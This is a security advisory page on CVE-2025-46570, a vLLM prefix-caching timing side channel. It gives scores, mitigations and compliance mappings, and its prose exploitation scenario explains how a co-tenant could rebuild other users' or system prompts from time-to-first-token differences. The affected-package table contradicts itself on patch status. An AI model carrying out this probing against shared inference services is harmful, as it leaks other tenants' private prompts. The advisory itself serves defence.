CVE-2025-46570: vLLM timing side-channel leaks prompt

Q: Is CVE-2025-46570 actively exploited?

No confirmed active exploitation of CVE-2025-46570 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2025-46570?

1. Upgrade vLLM to ≥0.9.0 (patch commit 77073c77). 2. Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation. 3. For multi-tenant deployments, enforce strict tenant isolation at the serving layer—separate vLLM instances per tenant eliminates the shared cache. 4. Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool. 5. Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.

Q: What systems are affected by CVE-2025-46570?

This vulnerability affects the following AI/ML architecture patterns: Multi-tenant LLM inference serving, Shared inference infrastructure, API gateway with cached LLM backends, LLM-as-a-service platforms.

Q: What is the CVSS score for CVE-2025-46570?

CVE-2025-46570 has a CVSS v3.1 base score of 2.6 (LOW). The EPSS exploitation probability is 0.25%.

CISO Take

If you run vLLM in a multi-tenant environment, upgrade to 0.9.0 immediately—PageAttention prefix caching creates measurable TTFT differences that allow authenticated users to infer fragments of other tenants' prompts or system prompts. Single-tenant and isolated deployments carry negligible risk. The patch is available and straightforward; there is no justification for delay.

What is the risk?

Low overall risk (CVSS 2.6), but contextually significant for multi-tenant LLM serving infrastructure. Exploitation requires network-level timing precision, an authenticated API account, and stable conditions to resolve sub-millisecond differences—making opportunistic attacks unlikely. The realistic threat model is a determined insider or co-tenant with sustained access probing a shared inference endpoint. Single-tenant private deployments behind a private network are not meaningfully affected.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
vLLM	pip	—	No patch
83.4K 130 dependents Pushed 4d ago 33% patched ~32d to patch Full package profile →
vLLM	pip	< 0.9.0	`0.9.0`
83.4K 130 dependents Pushed 4d ago 33% patched ~32d to patch Full package profile →

How severe is it?

CVSS 3.1

2.6 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 16% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Advanced

What is the attack surface?

AV Network

AC High

PR Low

UI Required

S Unchanged

C Low

I None

A None

What should I do?

5 steps

Upgrade vLLM to ≥0.9.0 (patch commit 77073c77).
Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation.
For multi-tenant deployments, enforce strict tenant isolation at the serving layer—separate vLLM instances per tenant eliminates the shared cache.
Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool.
Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Privacy Violation Data Extraction Inference Framework AML.T0040 - AI Model Inference API Access AML.T0043 - Craft Adversarial Data AML.T0057 - LLM Data Leakage AML.T0063 - Discover AI Model Outputs

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art.9 - Risk management system

ISO 42001

A.7.4 - Data privacy and protection in AI systems

NIST AI RMF

MEASURE 2.5 - Privacy risks are identified and monitored

OWASP LLM Top 10

LLM02 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2025-46570?

If you run vLLM in a multi-tenant environment, upgrade to 0.9.0 immediately—PageAttention prefix caching creates measurable TTFT differences that allow authenticated users to infer fragments of other tenants' prompts or system prompts. Single-tenant and isolated deployments carry negligible risk. The patch is available and straightforward; there is no justification for delay.

Is CVE-2025-46570 actively exploited?

No confirmed active exploitation of CVE-2025-46570 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-46570?

1. Upgrade vLLM to ≥0.9.0 (patch commit 77073c77). 2. Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation. 3. For multi-tenant deployments, enforce strict tenant isolation at the serving layer—separate vLLM instances per tenant eliminates the shared cache. 4. Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool. 5. Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.

What systems are affected by CVE-2025-46570?

This vulnerability affects the following AI/ML architecture patterns: Multi-tenant LLM inference serving, Shared inference infrastructure, API gateway with cached LLM backends, LLM-as-a-service platforms.

What is the CVSS score for CVE-2025-46570?

CVE-2025-46570 has a CVSS v3.1 base score of 2.6 (LOW). The EPSS exploitation probability is 0.25%.

What is the AI security impact?

Affected AI Architectures

Multi-tenant LLM inference servingShared inference infrastructureAPI gateway with cached LLM backendsLLM-as-a-service platforms

MITRE ATLAS Techniques

AML.T0040 AI Model Inference API Access

AML.T0043 Craft Adversarial Data

AML.T0057 LLM Data Leakage

AML.T0063 Discover AI Model Outputs

Compliance Controls Affected

EU AI Act: Art.9

ISO 42001: A.7.4

NIST AI RMF: MEASURE 2.5

OWASP LLM Top 10: LLM02

What are the technical details?

Original Advisory

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Exploitation Scenario

An adversary with a valid API account on a shared vLLM endpoint systematically submits prompts sharing prefixes with suspected system prompts or other users' conversation starters. Cache hit = fast TTFT, cache miss = slow TTFT. By performing a binary search over the prompt space across many requests, the attacker reconstructs cached prefix fragments character-by-character or token-by-token. The attack is noisy, requires stable network conditions to resolve timing differences reliably, and leaves a distinctive high-volume query pattern in access logs—but a patient attacker in a low-noise environment can extract meaningful fragments of proprietary or sensitive prompts.

Weaknesses (CWE)

CWE-203 Observable Discrepancy Primary CWE-208 Observable Timing Discrepancy Primary CWE-208 Observable Timing Discrepancy

CWE-203 — Observable Discrepancy: The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor.

[Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
[Implementation] Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.

Source: MITRE CWE corpus.